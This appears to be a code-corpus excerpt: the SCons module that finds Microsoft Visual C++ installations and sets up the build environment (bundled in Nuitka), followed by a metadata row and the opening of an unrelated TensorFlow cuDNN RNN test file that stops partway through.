"amd64" : "amd64",
"emt64" : "amd64",
"i386" : "x86",
"i486" : "x86",
"i586" : "x86",
"i686" : "x86",
"ia64" : "ia64", # deprecated
"itanium" : "ia64", # deprecated
"x86" : "x86",
"x86_64" : "amd64",
"arm" : "arm",
"arm64" : "arm64",
"aarch64" : "arm64",
}
_HOST_TARGET_TO_CL_DIR_GREATER_THAN_14 = {
("amd64","amd64") : ("Hostx64","x64"),
("amd64","x86") : ("Hostx64","x86"),
("amd64","arm") : ("Hostx64","arm"),
("amd64","arm64") : ("Hostx64","arm64"),
("x86","amd64") : ("Hostx86","x64"),
("x86","x86") : ("Hostx86","x86"),
("x86","arm") : ("Hostx86","arm"),
("x86","arm64") : ("Hostx86","arm64"),
}
# get path to the cl.exe dir for older VS versions
# based off a tuple of (host, target) platforms
_HOST_TARGET_TO_CL_DIR = {
("amd64","amd64") : "amd64",
("amd64","x86") : "amd64_x86",
("amd64","arm") : "amd64_arm",
("amd64","arm64") : "amd64_arm64",
("x86","amd64") : "x86_amd64",
("x86","x86") : "",
("x86","arm") : "x86_arm",
("x86","arm64") : "x86_arm64",
}
# Given a (host, target) tuple, return the argument for the bat file.
# Both host and targets should be canonalized.
_HOST_TARGET_ARCH_TO_BAT_ARCH = {
("x86", "x86"): "x86",
("x86", "amd64"): "x86_amd64",
("x86", "x86_amd64"): "x86_amd64",
("amd64", "x86_amd64"): "x86_amd64", # This is present in (at least) VS2012 express
("amd64", "amd64"): "amd64",
("amd64", "x86"): "x86",
("x86", "ia64"): "x86_ia64", # gone since 14.0
("arm", "arm"): "arm", # since 14.0, maybe gone 14.1?
("x86", "arm"): "x86_arm", # since 14.0
("x86", "arm64"): "x86_arm64", # since 14.1
("amd64", "arm"): "amd64_arm", # since 14.0
("amd64", "arm64"): "amd64_arm64", # since 14.1
}
_CL_EXE_NAME = 'cl.exe'
def get_msvc_version_numeric(msvc_version):
"""Get the raw version numbers from a MSVC_VERSION string, so it
could be cast to float or other numeric values. For example, '14.0Exp'
would get converted to '14.0'.
Args:
msvc_version: str
string representing the version number, could contain non
digit characters
Returns:
str: the value converted to a numeric only string
"""
return ''.join([x for x in msvc_version if x in string_digits + '.'])
def get_host_target(env):
debug('get_host_target()')
host_platform = env.get('HOST_ARCH')
if not host_platform:
host_platform = platform.machine()
# Solaris returns i86pc for both 32 and 64 bit architectures
if host_platform == "i86pc":
if platform.architecture()[0] == "64bit":
host_platform = "amd64"
else:
host_platform = "x86"
# Retain user requested TARGET_ARCH
req_target_platform = env.get('TARGET_ARCH')
debug('get_host_target() req_target_platform:%s'%req_target_platform)
if req_target_platform:
# If user requested a specific platform then only try that one.
target_platform = req_target_platform
else:
target_platform = host_platform
try:
host = _ARCH_TO_CANONICAL[host_platform.lower()]
except KeyError:
msg = "Unrecognized host architecture %s"
raise MSVCUnsupportedHostArch(msg % repr(host_platform))
try:
target = _ARCH_TO_CANONICAL[target_platform.lower()]
except KeyError:
all_archs = str(list(_ARCH_TO_CANONICAL.keys()))
raise MSVCUnsupportedTargetArch("Unrecognized target architecture %s\n\tValid architectures: %s" % (target_platform, all_archs))
return (host, target,req_target_platform)
# If you update this, update SupportedVSList in Tool/MSCommon/vs.py, and the
# MSVC_VERSION documentation in Tool/msvc.xml.
_VCVER = ["14.2", "14.1", "14.0", "14.0Exp", "12.0", "12.0Exp", "11.0", "11.0Exp", "10.0", "10.0Exp", "9.0", "9.0Exp","8.0", "8.0Exp","7.1", "7.0", "6.0"]
# if using vswhere, a further mapping is needed
_VCVER_TO_VSWHERE_VER = {
'14.2' : '[16.0, 17.0)',
'14.1' : '[15.0, 16.0)',
}
_VCVER_TO_PRODUCT_DIR = {
'14.2' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'')], # VS 2019 doesn't set this key
'14.1' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'')], # VS 2017 doesn't set this key
'14.0' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\14.0\Setup\VC\ProductDir')],
'14.0Exp' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\14.0\Setup\VC\ProductDir')],
'12.0' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\12.0\Setup\VC\ProductDir'),
],
'12.0Exp' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\12.0\Setup\VC\ProductDir'),
],
'11.0': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\11.0\Setup\VC\ProductDir'),
],
'11.0Exp' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\11.0\Setup\VC\ProductDir'),
],
'10.0': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\10.0\Setup\VC\ProductDir'),
],
'10.0Exp' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\10.0\Setup\VC\ProductDir'),
],
'9.0': [
(SCons.Util.HKEY_CURRENT_USER, r'Microsoft\DevDiv\VCForPython\9.0\installdir',),
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\9.0\Setup\VC\ProductDir',),
],
'9.0Exp' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\9.0\Setup\VC\ProductDir'),
],
'8.0': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\8.0\Setup\VC\ProductDir'),
],
'8.0Exp': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\8.0\Setup\VC\ProductDir'),
],
'7.1': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\7.1\Setup\VC\ProductDir'),
],
'7.0': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\7.0\Setup\VC\ProductDir'),
],
'6.0': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++\ProductDir'),
]
}
def msvc_version_to_maj_min(msvc_version):
msvc_version_numeric = get_msvc_version_numeric(msvc_version)
t = msvc_version_numeric.split(".")
if not len(t) == 2:
raise ValueError("Unrecognized version %s (%s)" % (msvc_version,msvc_version_numeric))
try:
maj = int(t[0])
min = int(t[1])
return maj, min
except ValueError as e:
raise ValueError("Unrecognized version %s (%s)" % (msvc_version,msvc_version_numeric))
def is_host_target_supported(host_target, msvc_version):
"""Check if (host, target) pair is supported for a VC version.
:note: only checks whether a given version *may* support the given (host,
target), not that the toolchain is actually present on the machine.
:param tuple host_target: canonalized host-targets pair, e.g.
("x86", "amd64") for cross compilation from 32 bit Windows to 64 bits.
:param str msvc_version: Visual C++ version (major.minor), e.g. "10.0"
:returns: True or False
"""
# We assume that any Visual Studio version supports x86 as a target
if host_target[1] != "x86":
maj, min = msvc_version_to_maj_min(msvc_version)
if maj < 8:
return False
return True
def find_vc_pdir_vswhere(msvc_version):
"""
Find the MSVC product directory using the vswhere program.
:param msvc_version: MSVC version to search for
:return: MSVC install dir or None
:raises UnsupportedVersion: if the version is not known by this file
"""
try:
vswhere_version = _VCVER_TO_VSWHERE_VER[msvc_version]
except KeyError:
debug("Unknown version of MSVC: %s" % msvc_version)
raise UnsupportedVersion("Unknown version %s" % msvc_version)
# For bug 3333 - support default location of vswhere for both 64 and 32 bit windows
# installs.
for pf in ['Program Files (x86)', 'Program Files']:
vswhere_path = os.path.join(
'C:\\',
pf,
'Microsoft Visual Studio',
'Installer',
'vswhere.exe'
)
if os.path.exists(vswhere_path):
# If we found vswhere, then use it.
break
else:
# No vswhere on system, no install info available
return None
vswhere_cmd = [vswhere_path,
'-products', '*',
'-version', vswhere_version,
'-property', 'installationPath']
#TODO PY27 cannot use Popen as context manager
# try putting it back to the old way for now
sp = subprocess.Popen(vswhere_cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
vsdir, err = sp.communicate()
if vsdir:
vsdir = vsdir.decode("mbcs").splitlines()
# vswhere could easily return multiple lines
# we could define a way to pick the one we prefer, but since
# this data is currently only used to make a check for existence,
# returning the first hit should be good enough for now.
vc_pdir = os.path.join(vsdir[0], 'VC')
return vc_pdir
else:
# No vswhere on system, no install info available
return None
def find_vc_pdir(msvc_version):
"""Find the MSVC product directory for the given version.
Tries to look up the path using a registry key from the table
_VCVER_TO_PRODUCT_DIR; if there is no key, calls find_vc_pdir_wshere
for help instead.
Args:
msvc_version: str
msvc version (major.minor, e.g. 10.0)
Returns:
str: Path found in registry, or None
Raises:
UnsupportedVersion: if the version is not known by this file.
MissingConfiguration: found version but the directory is missing.
Both exceptions inherit from VisualCException.
"""
root = 'Software\\'
try:
hkeys = _VCVER_TO_PRODUCT_DIR[msvc_version]
except KeyError:
debug("Unknown version of MSVC: %s" % msvc_version)
raise UnsupportedVersion("Unknown version %s" % msvc_version)
for hkroot, key in hkeys:
try:
comps = None
if not key:
comps = find_vc_pdir_vswhere(msvc_version)
if not comps:
debug('find_vc_pdir_vswhere(): no VC found for version {}'.format(repr(msvc_version)))
raise SCons.Util.WinError
debug('find_vc_pdir_vswhere(): VC found: {}'.format(repr(msvc_version)))
return comps
else:
if common.is_win64():
try:
# ordinally at win64, try Wow6432Node first.
comps = common.read_reg(root + 'Wow6432Node\\' + key, hkroot)
except SCons.Util.WinError as e:
# at Microsoft Visual Studio for Python 2.7, value is not in Wow6432Node
pass
if not comps:
# not Win64, or Microsoft Visual Studio for Python 2.7
comps = common.read_reg(root + key, hkroot)
except SCons.Util.WinError as e:
debug('find_vc_dir(): no VC registry key {}'.format(repr(key)))
else:
debug('find_vc_dir(): found VC in registry: {}'.format(comps))
if os.path.exists(comps):
return comps
else:
debug('find_vc_dir(): reg says dir is {}, but it does not exist. (ignoring)'.format(comps))
raise MissingConfiguration("registry dir {} not found on the filesystem".format(comps))
return None
def find_batch_file(env,msvc_version,host_arch,target_arch):
"""
Find the location of the batch script which should set up the compiler
for any TARGET_ARCH whose compilers were installed by Visual Studio/VCExpress
"""
pdir = find_vc_pdir(msvc_version)
if pdir is None:
raise NoVersionFound("No version of Visual Studio found")
debug('find_batch_file() in {}'.format(pdir))
# filter out e.g. "Exp" from the version name
msvc_ver_numeric = get_msvc_version_numeric(msvc_version)
vernum = float(msvc_ver_numeric)
if 7 <= vernum < 8:
pdir = os.path.join(pdir, os.pardir, "Common7", "Tools")
batfilename = os.path.join(pdir, "vsvars32.bat")
elif vernum < 7:
pdir = os.path.join(pdir, "Bin")
batfilename = os.path.join(pdir, "vcvars32.bat")
elif 8 <= vernum <= 14:
batfilename = os.path.join(pdir, "vcvarsall.bat")
else: # vernum >= 14.1 VS2017 and above
batfilename = os.path.join(pdir, "Auxiliary", "Build", "vcvarsall.bat")
if not os.path.exists(batfilename):
debug("Not found: %s" % batfilename)
batfilename = None
installed_sdks = get_installed_sdks()
for _sdk in installed_sdks:
sdk_bat_file = _sdk.get_sdk_vc_script(host_arch,target_arch)
if not sdk_bat_file:
debug("find_batch_file() not found:%s"%_sdk)
else:
sdk_bat_file_path = os.path.join(pdir,sdk_bat_file)
if os.path.exists(sdk_bat_file_path):
debug('find_batch_file() sdk_bat_file_path:%s'%sdk_bat_file_path)
return (batfilename, sdk_bat_file_path)
return (batfilename, None)
__INSTALLED_VCS_RUN = None
_VC_TOOLS_VERSION_FILE_PATH = ['Auxiliary', 'Build', 'Microsoft.VCToolsVersion.default.txt']
_VC_TOOLS_VERSION_FILE = os.sep.join(_VC_TOOLS_VERSION_FILE_PATH)
def _check_cl_exists_in_vc_dir(env, vc_dir, msvc_version):
"""Find the cl.exe on the filesystem in the vc_dir depending on
TARGET_ARCH, HOST_ARCH and the msvc version. TARGET_ARCH and
HOST_ARCH can be extracted from the passed env, unless its None,
which then the native platform is assumed the host and target.
Args:
env: Environment
a construction environment, usually if this is passed its
because there is a desired TARGET_ARCH to be used when searching
for a cl.exe
vc_dir: str
the path to the VC dir in the MSVC installation
msvc_version: str
msvc version (major.minor, e.g. 10.0)
Returns:
bool:
"""
# determine if there is a specific target platform we want to build for and
# use that to find a list of valid VCs, default is host platform == target platform
# and same for if no env is specified to extract target platform from
if env:
(host_platform, target_platform, req_target_platform) = get_host_target(env)
else:
host_platform = platform.machine().lower()
target_platform = host_platform
host_platform = _ARCH_TO_CANONICAL[host_platform]
target_platform = _ARCH_TO_CANONICAL[target_platform]
debug('_check_cl_exists_in_vc_dir(): host platform %s, target platform %s for version %s' % (host_platform, target_platform, msvc_version))
ver_num = float(get_msvc_version_numeric(msvc_version))
# make sure the cl.exe exists meaning the tool is installed
if ver_num > 14:
# 2017 and newer allowed multiple versions of the VC toolset to be installed at the same time.
# Just get the default tool version for now
#TODO: support setting a specific minor VC version
default_toolset_file = os.path.join(vc_dir, _VC_TOOLS_VERSION_FILE)
try:
with open(default_toolset_file) as f:
vc_specific_version = f.readlines()[0].strip()
except IOError:
debug('_check_cl_exists_in_vc_dir(): failed to read ' + default_toolset_file)
return False
except IndexError:
debug('_check_cl_exists_in_vc_dir(): failed to find MSVC version in ' + default_toolset_file)
return False
host_trgt_dir = _HOST_TARGET_TO_CL_DIR_GREATER_THAN_14.get((host_platform, target_platform), None)
if host_trgt_dir is None:
debug('_check_cl_exists_in_vc_dir(): unsupported host/target platform combo: (%s,%s)'%(host_platform, target_platform))
return False
cl_path = os.path.join(vc_dir, 'Tools','MSVC', vc_specific_version, 'bin', host_trgt_dir[0], host_trgt_dir[1], _CL_EXE_NAME)
debug('_check_cl_exists_in_vc_dir(): checking for ' + _CL_EXE_NAME + ' at ' + cl_path)
if os.path.exists(cl_path):
debug('_check_cl_exists_in_vc_dir(): found ' + _CL_EXE_NAME + '!')
return True
elif ver_num <= 14 and ver_num >= 8:
# Set default value to be -1 as "" which is the value for x86/x86 yields true when tested
# if not host_trgt_dir
host_trgt_dir = _HOST_TARGET_TO_CL_DIR.get((host_platform, target_platform), None)
if host_trgt_dir is None:
debug('_check_cl_exists_in_vc_dir(): unsupported host/target platform combo')
return False
cl_path = os.path.join(vc_dir, 'bin', host_trgt_dir, _CL_EXE_NAME)
debug('_check_cl_exists_in_vc_dir(): checking for ' + _CL_EXE_NAME + ' at ' + cl_path)
cl_path_exists = os.path.exists(cl_path)
if not cl_path_exists and host_platform == 'amd64':
# older versions of visual studio only had x86 binaries,
# so if the host platform is amd64, we need to check cross
# compile options (x86 binary compiles some other target on a 64 bit os)
# Set default value to be -1 as "" which is the value for x86/x86 yields true when tested
# if not host_trgt_dir
host_trgt_dir = _HOST_TARGET_TO_CL_DIR.get(('x86', target_platform), None)
if host_trgt_dir is None:
return False
cl_path = os.path.join(vc_dir, 'bin', host_trgt_dir, _CL_EXE_NAME)
debug('_check_cl_exists_in_vc_dir(): checking for ' + _CL_EXE_NAME + ' at ' + cl_path)
cl_path_exists = os.path.exists(cl_path)
if cl_path_exists:
debug('_check_cl_exists_in_vc_dir(): found ' + _CL_EXE_NAME + '!')
return True
elif ver_num < 8 and ver_num >= 6:
# not sure about these versions so if a walk the VC dir (could be slow)
for root, _, files in os.walk(vc_dir):
if _CL_EXE_NAME in files:
debug('get_installed_vcs ' + _CL_EXE_NAME + ' found %s' % os.path.join(root, _CL_EXE_NAME))
return True
return False
else:
# version not support return false
debug('_check_cl_exists_in_vc_dir(): unsupported MSVC version: ' + str(ver_num))
return False
def cached_get_installed_vcs(env=None):
global __INSTALLED_VCS_RUN
if __INSTALLED_VCS_RUN is None:
ret = get_installed_vcs(env)
__INSTALLED_VCS_RUN = ret
return __INSTALLED_VCS_RUN
def get_installed_vcs(env=None):
installed_versions = []
for ver in _VCVER:
debug('trying to find VC %s' % ver)
try:
VC_DIR = find_vc_pdir(ver)
if VC_DIR:
debug('found VC %s' % ver)
if _check_cl_exists_in_vc_dir(env, VC_DIR, ver):
installed_versions.append(ver)
else:
debug('find_vc_pdir no compiler found %s' % ver)
else:
debug('find_vc_pdir return None for ver %s' % ver)
except (MSVCUnsupportedTargetArch, MSVCUnsupportedHostArch):
# Allow this exception to propagate further as it should cause
# SCons to exit with an error code
raise
except VisualCException as e:
debug('did not find VC %s: caught exception %s' % (ver, str(e)))
return installed_versions
def reset_installed_vcs():
"""Make it try again to find VC. This is just for the tests."""
__INSTALLED_VCS_RUN = None
# Running these batch files isn't cheap: most of the time spent in
# msvs.generate() is due to vcvars*.bat. In a build that uses "tools='msvs'"
# in multiple environments, for example:
# env1 = Environment(tools='msvs')
# env2 = Environment(tools='msvs')
# we can greatly improve the speed of the second and subsequent Environment
# (or Clone) calls by memoizing the environment variables set by vcvars*.bat.
#
# Updated: by 2018, vcvarsall.bat had gotten so expensive (vs2017 era)
# it was breaking CI builds because the test suite starts scons so many
# times and the existing memo logic only helped with repeated calls
# within the same scons run. Windows builds on the CI system were split
# into chunks to get around single-build time limits.
# With VS2019 it got even slower and an optional persistent cache file
# was introduced. The cache now also stores only the parsed vars,
# not the entire output of running the batch file - saves a bit
# of time not parsing every time.
script_env_cache = None
def script_env(script, args=None):
global script_env_cache
if script_env_cache is None:
script_env_cache = common.read_script_env_cache()
cache_key = "{}--{}".format(script, args)
cache_data = script_env_cache.get(cache_key, None)
if cache_data is None:
stdout = common.get_output(script, args)
# Stupid batch files do not set return code: we take a look at the
# beginning of the output for an error message instead
olines = stdout.splitlines()
if olines[0].startswith("The specified configuration type is missing"):
raise BatchFileExecutionError("\n".join(olines[:2]))
cache_data = common.parse_output(stdout)
script_env_cache[cache_key] = cache_data
# once we updated cache, give a chance to write out if user wanted
common.write_script_env_cache(script_env_cache)
else:
#TODO: Python 2 cleanup
# If we "hit" data from the json file, we have a Py2 problem:
# keys & values will be unicode. don't detect, just convert.
if sys.version_info[0] == 2:
def convert(data):
if isinstance(data, basestring):
return str(data)
elif isinstance(data, collections.Mapping):
return dict(map(convert, data.iteritems()))
elif isinstance(data, collections.Iterable):
return type(data)(map(convert, data))
else:
return data
cache_data = convert(cache_data)
return cache_data
def get_default_version(env):
debug('get_default_version()')
msvc_version = env.get('MSVC_VERSION')
msvs_version = env.get('MSVS_VERSION')
debug('get_default_version(): msvc_version:%s msvs_version:%s'%(msvc_version,msvs_version))
if msvs_version and not msvc_version:
SCons.Warnings.warn(
SCons.Warnings.DeprecatedWarning,
"MSVS_VERSION is deprecated: please use MSVC_VERSION instead ")
return msvs_version
elif msvc_version and msvs_version:
if not msvc_version == msvs_version:
SCons.Warnings.warn(
SCons.Warnings.VisualVersionMismatch,
"Requested msvc version (%s) and msvs version (%s) do " \
"not match: please use MSVC_VERSION only to request a " \
"visual studio version, MSVS_VERSION is deprecated" \
% (msvc_version, msvs_version))
return msvs_version
if not msvc_version:
installed_vcs = cached_get_installed_vcs(env)
debug('installed_vcs:%s' % installed_vcs)
if not installed_vcs:
#msg = 'No installed VCs'
#debug('msv %s' % repr(msg))
#SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning, msg)
debug('msvc_setup_env: No installed VCs')
return None
msvc_version = installed_vcs[0]
debug('msvc_setup_env: using default installed MSVC version %s' % repr(msvc_version))
return msvc_version
def msvc_setup_env_once(env):
try:
has_run = env["MSVC_SETUP_RUN"]
except KeyError:
has_run = False
if not has_run:
msvc_setup_env(env)
env["MSVC_SETUP_RUN"] = True
def msvc_find_valid_batch_script(env, version):
debug('msvc_find_valid_batch_script()')
# Find the host platform, target platform, and if present the requested
# target platform
platforms = get_host_target(env)
debug(" msvs_find_valid_batch_script(): host_platform %s, target_platform %s req_target_platform:%s" % platforms)
host_platform, target_platform, req_target_platform = platforms
try_target_archs = [target_platform]
# VS2012 has a "cross compile" environment to build 64 bit
# with x86_amd64 as the argument to the batch setup script
if req_target_platform in ('amd64', 'x86_64'):
try_target_archs.append('x86_amd64')
elif not req_target_platform and target_platform in ['amd64', 'x86_64']:
# There may not be "native" amd64, but maybe "cross" x86_amd64 tools
try_target_archs.append('x86_amd64')
# If the user hasn't specifically requested a TARGET_ARCH, and
# The TARGET_ARCH is amd64 then also try 32 bits if there are no viable
# 64 bit tools installed
try_target_archs.append('x86')
debug("msvs_find_valid_batch_script(): host_platform: %s try_target_archs:%s"%(host_platform, try_target_archs))
d = None
for tp in try_target_archs:
# Set to current arch.
env['TARGET_ARCH']=tp
debug("msvc_find_valid_batch_script() trying target_platform:%s"%tp)
host_target = (host_platform, tp)
if not is_host_target_supported(host_target, version):
warn_msg = "host, target = %s not supported for MSVC version %s" % \
(host_target, version)
SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning, warn_msg)
arg = _HOST_TARGET_ARCH_TO_BAT_ARCH[host_target]
# Get just version numbers
maj, min = msvc_version_to_maj_min(version)
# VS2015+
if maj >= 14:
if env.get('MSVC_UWP_APP') == '1':
# Initialize environment variables with store/universal paths
arg += ' store'
# Try to locate a batch file for this host/target platform combo
try:
(vc_script, sdk_script) = find_batch_file(env, version, host_platform, tp)
debug('msvc_find_valid_batch_script() vc_script:%s sdk_script:%s'%(vc_script,sdk_script))
except VisualCException as e:
msg = str(e)
debug('Caught exception while looking for batch file (%s)' % msg)
warn_msg = "VC version %s not installed. " + \
"C/C++ compilers are most likely not set correctly.\n" + \
" Installed versions are: %s"
warn_msg = warn_msg % (version, cached_get_installed_vcs(env))
SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning, warn_msg)
continue
# Try to use the located batch file for this host/target platform combo
debug('msvc_find_valid_batch_script() use_script 2 %s, args:%s' % (repr(vc_script), arg))
found = None
if vc_script:
try:
d = script_env(vc_script, args=arg)
found = vc_script
except BatchFileExecutionError as e:
debug('msvc_find_valid_batch_script() use_script 3: failed running VC script %s: %s: Error:%s'%(repr(vc_script),arg,e))
vc_script=None
continue
if not vc_script and sdk_script:
debug('msvc_find_valid_batch_script() use_script 4: trying sdk script: %s'%(sdk_script))
try:
d = script_env(sdk_script)
found = sdk_script
except BatchFileExecutionError as e:
debug('msvc_find_valid_batch_script() use_script 5: failed running SDK script %s: Error:%s'%(repr(sdk_script),e))
continue
elif not vc_script and not sdk_script:
debug('msvc_find_valid_batch_script() use_script 6: Neither VC script nor SDK script found')
continue
debug("msvc_find_valid_batch_script() Found a working script/target: %s/%s"%(repr(found),arg))
break # We've found a working target_platform, so stop looking
# If we cannot find a viable installed compiler, reset the TARGET_ARCH
# To it's initial value
if not d:
env['TARGET_ARCH']=req_target_platform
return d
def msvc_setup_env(env):
debug('msvc_setup_env()')
version = get_default_version(env)
if version is None:
warn_msg = "No version of Visual Studio compiler found - C/C++ " \
"compilers most likely not set correctly"
# Nuitka: Useless warning for us.
# SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning, warn_msg)
return None
debug('msvc_setup_env: using specified MSVC version %s' % repr(version))
# XXX: we set-up both MSVS version for backward
# compatibility with the msvs tool
env['MSVC_VERSION'] = version
env['MSVS_VERSION'] = version
env['MSVS'] = {}
use_script = env.get('MSVC_USE_SCRIPT', True)
if SCons.Util.is_String(use_script):
debug('msvc_setup_env() use_script 1 %s' % repr(use_script))
d = script_env(use_script)
elif use_script:
d = msvc_find_valid_batch_script(env,version)
debug('msvc_setup_env() use_script 2 %s' % d)
if not d:
return d
else:
debug('MSVC_USE_SCRIPT set to False')
warn_msg = "MSVC_USE_SCRIPT set to False, assuming environment " \
"set correctly."
# Nuitka: We use this on purpose.
# SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning, warn_msg)
return None
for k, v in d.items():
# Nuitka: Make the Windows SDK version visible in environment.
if k == "WindowsSDKVersion":
# Always just a single version if any.
if len(v) == 1:
env["WindowsSDKVersion"] = v[0].rstrip('\\')
elif len(v) == 0:
env["WindowsSDKVersion"] = None
else:
assert False, v
continue
debug('msvc_setup_env() env:%s -> %s'%(k,v))
env.PrependENVPath(k, v, delete_existing=True)
# final check to issue a warning if the compiler is not present
msvc_cl = find_program_path(env, 'cl')
if not msvc_cl:
SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning,
"Could not find MSVC compiler 'cl', it may need to be installed separately with Visual Studio")
def msvc_exists(env=None, version=None):
vcs = cached_get_installed_vcs(env)
if version is None:
return len(vcs) > 0
return version in vcs
|
kayhayen/Nuitka
|
nuitka/build/inline_copy/lib/scons-3.1.2/SCons/Tool/MSCommon/vc.py
|
Python
|
apache-2.0
| 33,537 | 0.006202 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Cudnn RNN models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import functools
import itertools
import os
import sys
import unittest
import numpy as np
from tensorflow.contrib.cudnn_rnn.python.layers import cudnn_rnn
from tensorflow.contrib.cudnn_rnn.python.ops import cudnn_rnn_ops
from tensorflow.contrib.rnn.python.ops import rnn as contrib_rnn_lib
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import gradients_impl as gradients
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn as rnn_lib
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops import variables
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import adagrad
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import momentum
from tensorflow.python.training import rmsprop
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training.checkpointable import util as checkpointable_utils
CUDNN_LSTM = cudnn_rnn_ops.CUDNN_LSTM
CUDNN_GRU = cudnn_rnn_ops.CUDNN_GRU
CUDNN_RNN_RELU = cudnn_rnn_ops.CUDNN_RNN_RELU
CUDNN_RNN_TANH = cudnn_rnn_ops.CUDNN_RNN_TANH
CUDNN_RNN_UNIDIRECTION = cudnn_rnn_ops.CUDNN_RNN_UNIDIRECTION
CUDNN_RNN_BIDIRECTION = cudnn_rnn_ops.CUDNN_RNN_BIDIRECTION
CUDNN_LSTM_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_LSTM_PARAMS_PER_LAYER
CUDNN_GRU_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_GRU_PARAMS_PER_LAYER
CUDNN_RNN_TANH_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_RNN_TANH_PARAMS_PER_LAYER
CUDNN_RNN_RELU_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_RNN_RELU_PARAMS_PER_LAYER
class CudnnTestModel(object):
"""Model with convenient APIs for easier building and running test graph.
The graph built is used by all tests below to avoid repeatedly building
similar test graphs.
"""
def __init__(self,
rnn_mode,
num_layers,
num_units,
input_size,
direction=CUDNN_RNN_UNIDIRECTION,
dropout=0.,
dtype=dtypes.float32,
training=False,
seed=None,
kernel_initializer=None,
bias_initializer=None):
if dtype not in (dtypes.float16, dtypes.float32, dtypes.float64):
raise ValueError("Invalid dtype: %s" % dtype)
self._dtype = dtype
self._inputs = array_ops.placeholder(
dtype=dtype, shape=[None, None, input_size], name="inputs")
h = array_ops.placeholder(
dtype=dtype, shape=[None, None, num_units], name="h")
c = array_ops.placeholder(
dtype=dtype, shape=[None, None, num_units], name="c")
if rnn_mode == CUDNN_LSTM:
model_fn = cudnn_rnn.CudnnLSTM
self._initial_state = (h, c)
elif rnn_mode == CUDNN_GRU:
model_fn = cudnn_rnn.CudnnGRU
self._initial_state = (h,)
elif rnn_mode == CUDNN_RNN_TANH:
model_fn = cudnn_rnn.CudnnRNNTanh
self._initial_state = (h,)
elif rnn_mode == CUDNN_RNN_RELU:
model_fn = cudnn_rnn.CudnnRNNRelu
self._initial_state = (h,)
else:
raise ValueError("Invalid rnn_mode: %s" % rnn_mode)
self._rnn = model_fn(
num_layers,
num_units,
direction=direction,
dropout=dropout,
dtype=dtype,
seed=seed,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer)
self._rnn.build([None, None, input_size])
self._outputs, self._output_state = self._rnn(
self._inputs, initial_state=self._initial_state, training=training)
def _AddUp(self, outputs, output_state):
total = math_ops.reduce_sum(outputs)
for s in output_state:
total += math_ops.reduce_sum(s)
return total
@property
def inputs(self):
return self._inputs
@property
def initial_state(self):
return self._initial_state
@property
def outputs(self):
return self._outputs
@property
def output_state(self):
return self._output_state
@property
def rnn(self):
return self._rnn
@property
def total_sum(self):
return self._AddUp(self.outputs, self.output_state)
def SynthesizeInput(self, seq_length, batch_size, seed=1234):
"""Synthesizes input and initial state values for testing."""
np.random.seed(seed)
num_layers = self._rnn.num_layers
dir_count = self._rnn.num_dirs
num_units = self._rnn.num_units
input_size = self._rnn.input_size
np_dtype = np.float32 if self._dtype == dtypes.float32 else np.float64
inputs = np.random.randn(seq_length, batch_size,
input_size).astype(np_dtype)
input_h = np.random.randn(num_layers * dir_count, batch_size,
num_units).astype(np_dtype)
if self._rnn.rnn_mode == CUDNN_LSTM:
input_c = np.random.randn(num_layers * dir_count, batch_size,
num_units).astype(np_dtype)
initial_state = (input_h, input_c)
else:
initial_state = (input_h,)
